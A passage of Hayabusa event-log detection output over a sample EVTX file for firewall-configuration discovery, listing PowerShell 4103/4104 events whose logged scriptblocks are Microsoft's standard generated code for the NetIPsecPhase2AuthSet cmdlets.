name=""Function""; value=""Get-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 